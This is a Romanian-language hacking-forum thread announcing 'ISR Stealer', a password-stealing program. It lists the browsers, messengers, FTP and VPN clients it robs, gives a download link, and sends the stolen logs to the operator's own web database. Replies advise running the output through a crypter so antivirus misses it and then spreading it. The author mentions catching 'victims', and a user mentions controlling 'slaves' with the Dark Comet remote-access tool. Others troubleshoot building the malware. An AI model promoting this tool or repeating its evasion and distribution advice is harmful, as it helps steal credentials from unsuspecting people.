Jump to content

Recommended Posts

########################################################

#Made in: Romania, Europe

#Release date: 27.02.2012

#Gfx by: Y.xakep and Tinkode

#Credits: Cobein, 7, Bilal Ghouri, SqUeEzEr, Rtflol and Nirsoft team.

#Beta testers : linuxgirl, zippy and wav3

#Developed for: InSecurity.Ro

isrv.jpg

#Send logs to my sql data base(php)

#Change server icon

#Steal options:

Internet Explorer (All Versions)

Mozilla Firefox (All Versions)

Google Chrome (All Versions)

Opera (All Versions)

Safari (All Versions)

VPN/Network Accounts

Yahoo Messenger 8/9/10 Password

Yahoo ETS

Msn Messenger

Pidgin

Filezilla

No-ip

DynDns

################################################################

Download:

http://up.ht/wCPNmG

Edited by B3st
Link to comment
Share on other sites

Ok si ce ai vrea sa nu fie raportat ca virus? Ruleaza-l in sandbox (recomandat), ia un crypter... fa FUD fisierul rezultat si imprastie-l.

Poate n-ai inteles, dar are legatura directa cu semnatura : El iti ofera gratuit stealer-ul, dar pentru a-l face FUD, ai nevoie de un crypter... pe care el il ofera contra-cost... daca ai deja un crypter n-o sa fii nevoit sa cumperi de la el.

//L.E.: N-am downloadat programul, nu-l pot recomanda. Prefer sa faca altii treaba cu stealer-ul si sa cumpar de la ei strict log-urile de care am nevoie.

Link to comment
Share on other sites

Chiar imi place , singurul stealer care mi-a furat parolele mele din chrome (asta si Dark Comet 5) .

O sa imi faca munca de rezolvat sclavii din Dark Comet 3.2 mai usoara (DC 5 nu imi merge pe alte calculatoare , nenea prietenul tau DarkCoder nu raspunde la contact :) )

Apropo + rep :)

//temele imi par cunoscute

//// ori este o versiune imbunatatita a Sharp Stealer ???

Edited by sandabot
Link to comment
Share on other sites

@sandabot

Sharp este un prieten vechi, i-am dat sursa de la isr stealer 0.3 ca sa isi faca de cap.

Btw, mersi pentru test.

Chrome, internet explorer, opera si firefox stiu ca merg perfect dar nu prea am prins victime cu safari pentru a testa mai bine.

Edited by B3st
Link to comment
Share on other sites

Mie imi apare o problema, am facut tot ce trebuia sa fac, am pagina si totul e in regula. Dar cand pun php url a mea de la index.php si dupaia aleg un icon. Dau build server. Se creeaza, dau pe el sa vad daca ma infectez si nimic. Nu imi apare nimic la mine pe pagina, si cand deschid serverul imi apare o eroare, care spune ca nu functioneaza :( Stie cineva de ce nu imi merge?

Link to comment
Share on other sites

Mie imi apare o problema, am facut tot ce trebuia sa fac, am pagina si totul e in regula. Dar cand pun php url a mea de la index.php si dupaia aleg un icon. Dau build server. Se creeaza, dau pe el sa vad daca ma infectez si nimic. Nu imi apare nimic la mine pe pagina, si cand deschid serverul imi apare o eroare, care spune ca nu functioneaza :( Stie cineva de ce nu imi merge?

Ai modificat datele de conectare la baza de date?

Link to comment
Share on other sites

Am creat serverul si mi-a aparut DONE. Si am facut si cum ai zis tu si mi-a aparut Done, check your logs. Adica totul merge bine. Dar cand deschid serverul imi da erroare ca nu functioneaza, ma uit sa vad daca a aparut ceva pe pagina mea si nu este nimic.. :S nu stiu unde e problema.

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.


×
×
  • Create New...